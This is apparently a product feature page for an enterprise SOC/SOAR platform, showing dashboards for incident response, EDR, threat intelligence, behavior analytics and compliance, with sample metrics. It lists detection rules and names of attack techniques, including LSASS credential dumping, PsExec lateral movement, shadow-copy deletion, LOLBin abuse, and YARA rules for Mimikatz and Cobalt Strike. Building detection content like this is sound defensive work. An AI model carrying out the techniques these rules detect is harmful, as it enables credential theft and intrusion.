SOAR Solution

Enterprise Dashboard

Executive Security Overview

Real-time security posture with KPIs, trends, and actionable insights for C-level executives.

Security Posture Dashboard

Comprehensive view of organization security health

12

Critical Alerts

28

High Severity

67

Medium

142

Low

2,847

Protected Endpoints

94%

Compliance Score

Dashboard Cards & Widgets

Security Score Ring

Visual gauge showing overall security posture (0-100) with color-coded severity zones.

Real-time score calculation
Historical trend line
Benchmark comparison

Threat Timeline

24-hour rolling timeline of detected threats with severity breakdown.

Hourly event distribution
Peak hour identification
Trend indicators

Asset Health

Endpoint status overview showing online, offline, and at-risk systems.

Agent status monitoring
Update compliance
Policy adherence

Top Risks

Priority-ranked list of current security risks requiring immediate attention.

Risk scoring algorithm
One-click investigation
Remediation shortcuts

SOAR Platform

Security Orchestration, Automation & Response

Visual playbook builder with 40+ automated response actions and enterprise approval workflows.

SOAR Dashboard

Complete incident management and automated response

23

Open Incidents

12

Active Playbooks

5

Pending Approvals

89%

Automation Rate

156

Executions Today

4.2m

Avg MTTR

Overview

Incidents

Playbook Builder

Executions

Approvals

Attack Storyline

Incident Management Tab

Incident Queue

Filterable list by category, status, severity, assignee. Bulk select with multi-action support.

Bulk Actions

Update status, assign analyst, run playbook, change severity on multiple incidents at once.

Smart Filters

Filter by: Open/In Progress/Resolved, Critical/High/Medium/Low, Category, Date Range, Assignee.

Visual Playbook Builder (Cytoscape.js)

Drag-and-drop canvas with 25+ node types for building automated response workflows.

Trigger Nodes

Alert Trigger Schedule Trigger Manual Trigger

Response Actions

Isolate Host Block IP Kill Process Quarantine File Disable User Lock Screen Force Reboot

PrahiXEDR Actions (14 Actions)

Block IP (Firewall) Disable Service Disable USB Force Logout Memory Dump Collect Event Logs Registry Delete Shred File YARA Scan Get Autoruns Kill Process Tree Uninstall Software

Enrichment Actions

IOC Lookup VirusTotal Scan WHOIS Lookup Collect Artifacts

Logic & Control Nodes

Condition (If/Else) Loop Delay/Wait Parallel Execution

Notification & Approval

Slack Teams Email Jira Ticket Request Approval

Playbook Builder Features

Version Control

Full version history
Compare versions side-by-side
Rollback to any version
Change annotations

Test Execution

Dry-run mode
Visual execution trace
Step-by-step debugging
Variable inspection

Approval Workflows

Multi-level approvals
Approval timeouts
Slack/Teams notifications
Audit trail

Attack Storyline (Neo4j Graph)

Graph database visualization of attack chains showing process-file-network relationships.

Process Nodes

Name, PID, command line, path, parent PID with SPAWNED relationships.

File Nodes

File access/modification events with ACCESSED, WROTE, DELETED relationships.

Network Nodes

Connection events with CONNECTED_TO relationships showing C2 communication.

Registry Nodes

Registry modification events with MODIFIED relationships for persistence tracking.

Security Alerts

Alert Management Console

Centralized alert management with filtering, categorization, and MITRE ATT&CK mapping.

Security Alerts Dashboard

Real-time threat notifications and alert management

12

Critical

28

High

67

Medium

142

Low

249

Total (24h)

All Alerts

Security

Network

Infrastructure

Wireless

Application

Alert Filters

Severity Status (New/Acknowledged/Resolved) Category Time Range Search Source Device

Alert Item Details

Field	Description
Title	Alert name/description
Source	Originating device/system
Timestamp	Detection time with timezone
Severity	Critical High Medium Low
MITRE Mapping	Technique ID (e.g., T1059.001)
Actions	Acknowledge, Investigate, Assign, Create Playbook, Dismiss

SOC v2 Dashboard

Advanced Threat Analytics

MITRE ATT&CK matrix visualization, kill chain tracking, and threat intelligence.

SOC v2.0 – Advanced Threat Analytics

Real-time MITRE ATT&CK coverage and kill chain visualization

47

Active Threats

14

Tactics Covered

207

Techniques

89%

Detection Coverage

MITRE ATT&CK Tactics (14 Tactics)

Recon

10

techniques

Resource Dev

8

techniques

Initial Access

15

techniques

Execution

22

techniques

Persistence

19

techniques

Priv. Escalation

13

techniques

Defense Evasion

28

techniques

Credential Access

17

techniques

Discovery

21

techniques

Lateral Movement

9

techniques

Collection

12

techniques

C2

18

techniques

Exfiltration

11

techniques

Impact

14

techniques

Cyber Kill Chain Visualization

Reconnaissance

3

Weaponization

2

Delivery

8

Exploitation

12

Installation

5

C2

4

Actions

1

Incident Timeline

Chronological view of security events with severity-coded timeline markers.

Critical Events

Red timeline markers with pulsing animation for immediate attention.

Warning Events

Amber markers for high/medium severity requiring review.

Info Events

Blue markers for informational and low severity events.

EDR Dashboard

Endpoint Detection & Response

Real-time endpoint protection with behavioral analysis, memory scanning, and LOLBin detection.

EDR Dashboard – Live Monitoring

Endpoint Detection & Response with prevention mode

5

Critical

12

High Severity

847

Total Events (24h)

23

Memory Threats

45

LOLBin Activity

156

Endpoints

Prevention Mode Banner

Detection/Prevention Toggle: Switch between detect-only mode and active prevention. Shows “Blocked Today” counter.

Memory Threats Panel

8

Injections

5

Shellcode

3

Hollowing

7

RWX Regions

“Scan Fleet” button for memory scanning across all endpoints.

LOLBin Activity Grid

12

certutil

8

mshta

5

regsvr32

7

rundll32

4

wmic

3

bitsadmin

2

cscript

4

powershell

EDR Dashboard Panels

Recent Detections

Scrollable list of detection events with severity filter.

Severity filtering (Critical/High/Medium/Low)
One-click investigation
MITRE technique tags

Top Affected Hosts

Ranked list of endpoints with most detections.

Hostname & detection count
Click to view host details
Quick isolate option

MITRE Techniques Panel

Top detected MITRE ATT&CK techniques.

T1059.001 – PowerShell
T1003.001 – LSASS Memory
T1547.001 – Registry Run Keys

Recent IOCs

Indicators of Compromise extracted from events.

IP addresses
File hashes (MD5/SHA256)
Domains/URLs

Quick Actions

One-click response actions.

Isolate All (affected hosts)
Full Fleet Scan
Export IOCs
Link to SOAR

Threat Hunt Builder

Query interface for proactive threat hunting.

KQL-style queries
Save & schedule hunts
Export results

Threat Intelligence

Threat Intelligence Platform

IOC database with 8,000+ indicators, YARA rules, and behavioral detection.

Threat Intelligence Dashboard

IOC matching, YARA rules, and behavioral detection

34

Active Threats

127

YARA Matches

892

Malicious Hashes

1,247

Bad IPs Blocked

45

DGA Detected

Dashboard Actions

VirusTotal Lookup Import IOCs YARA Editor IOC Lookup

Active YARA Rules

Rule Name	Severity
Mimikatz_Strings	Critical
CobaltStrike_Beacon	Critical
PowerShell_Download_Execute	High
Ransomware_Indicators	Critical
Webshell_Indicators	Critical
Persistence_Registry	High

IOC Database (8,000+ IOCs)

3,245

IP Addresses

2,891

Domains

1,567

File Hashes

412

URLs

Behavioral Detection Rules

Credential_Dumping

Process accessing LSASS memory. Threshold: 1 event. Critical

Lateral_Movement_PSExec

PsExec-style lateral movement. Threshold: 1 event. High

Mass_File_Encryption

Rapid file modifications (ransomware). Threshold: 50 files/1 min. Critical

Brute_Force_Login

Multiple failed login attempts. Threshold: 10 fails/5 min. High

Shadow_Copy_Deletion

VSS deletion (ransomware indicator). Threshold: 1 event. Critical

Scheduled_Task_Persistence

Suspicious scheduled task creation. Threshold: 1 event. High

STIX/TAXII Feed Integration

Feed Name	IOC Count	Status
AlienVault OTX	15,234 IOCs	Synced
Abuse.ch URLhaus	8,547 URLs	Synced
MISP Default	45,891 IOCs	Synced
Custom TAXII Server	2,341 IOCs	Pending

UEBA Dashboard

User & Entity Behavior Analytics

ML-powered anomaly detection, insider threat detection, and impossible travel alerts.

UEBA – Behavior Analytics

Detect anomalous user behavior, insider threats, and compromised accounts

12

Active Users

8

ML Anomalies

23

Failed Logins

2

Impossible Travel

3

Privilege Escalation

Low

Insider Threat Score

ML Anomaly Detection

94%

Model Accuracy

1.2M

Events Analyzed

0.3%

False Positive Rate

Running ML Models:

Login Pattern Analysis
Resource Access Profiling
Behavior Deviation Scoring

Impossible Travel Alerts

admin_default – Mumbai → New York in 30 mins Critical

AmitK – Delhi → Singapore in 2 hours Review

Peer Group Analysis

Administrators (3 users)

Avg Daily Logins: 4.2
Avg Privilege Uses: 12.5
Deviation Threshold: 2.5σ

Developers (8 users)

Avg Daily Logins: 2.1
Avg File Access: 45.3
Deviation Threshold: 3.0σ

Support Staff (5 users)

Avg Daily Logins: 1.5
Avg Ticket Access: 23.7
Deviation Threshold: 2.0σ

Compliance & Vulnerability

Enterprise Compliance & Vulnerability Management

Endpoint compliance, USB control, DLP, and CVE vulnerability scanning.

Compliance Dashboard

Endpoint compliance status & DLP

94%

Compliance Score

1/1

Endpoints Compliant

Quick Status Cards

Antivirus: Enabled

Firewall: All Profiles

BitLocker: Disabled

Updates: Current

TPM: v2.0

Screen Lock: 15 min

USB Device Control

Device	Type	Status
SanDisk Ultra USB	Storage	Monitored
Logitech USB Receiver	HID	Allowed

Blacklisted Software

BitTorrent Tor Browser AnyDesk (Detected) TeamViewer

Vulnerability Dashboard

CVE detection & software scanning

2

Critical CVEs

3

High CVEs

2

Medium

65

Apps Scanned

Top Vulnerabilities

CVE	Software	CVSS
CVE-2023-38831	WinRAR	8.6
CVE-2024-31497	PuTTY	8.1
CVE-2024-0001	Chrome	8.8
CVE-2023-44336	Adobe Acrobat	7.8

Click “Run Scan” to detect new vulnerabilities.

Compliance Frameworks

Supported Regulatory Frameworks

Pre-built compliance frameworks with automated assessment and gap analysis.

CIS Controls v8

18 Critical Security Controls

NIST CSF

Cybersecurity Framework

PCI-DSS

Payment Card Industry

HIPAA

Healthcare Compliance

SOC 2

Trust Services Criteria

ISO 27001

Information Security

Integrations

30+ Security Integrations

Connect with your existing security stack for unified visibility.

FortiGate

Palo Alto

CrowdStrike

SentinelOne

Sophos

Elasticsearch

Slack

Teams

Jira

Email/SMTP

Active Directory

AWS/Azure

VirusTotal

AlienVault OTX

Cisco

Check Point

Splunk

Zabbix

Complete SOC & SOAR Solution

Executive Security Overview

Security Posture Dashboard

Dashboard Cards & Widgets

Security Orchestration, Automation & Response

SOAR Dashboard

Incident Management Tab

Visual Playbook Builder (Cytoscape.js)

Playbook Builder Features

Attack Storyline (Neo4j Graph)

Alert Management Console

Security Alerts Dashboard

Alert Filters

Alert Item Details

Advanced Threat Analytics

SOC v2.0 – Advanced Threat Analytics

MITRE ATT&CK Tactics (14 Tactics)

Cyber Kill Chain Visualization

Incident Timeline

Endpoint Detection & Response

EDR Dashboard – Live Monitoring

Prevention Mode Banner

Memory Threats Panel

LOLBin Activity Grid

EDR Dashboard Panels

Threat Intelligence Platform

Threat Intelligence Dashboard

Dashboard Actions

Active YARA Rules

IOC Database (8,000+ IOCs)

Behavioral Detection Rules

STIX/TAXII Feed Integration

User & Entity Behavior Analytics

UEBA – Behavior Analytics

ML Anomaly Detection

Impossible Travel Alerts

Peer Group Analysis

Enterprise Compliance & Vulnerability Management

Compliance Dashboard

Quick Status Cards

USB Device Control

Blacklisted Software

Vulnerability Dashboard

Top Vulnerabilities

Supported Regulatory Frameworks

30+ Security Integrations

Ready to Transform Your Security Operations?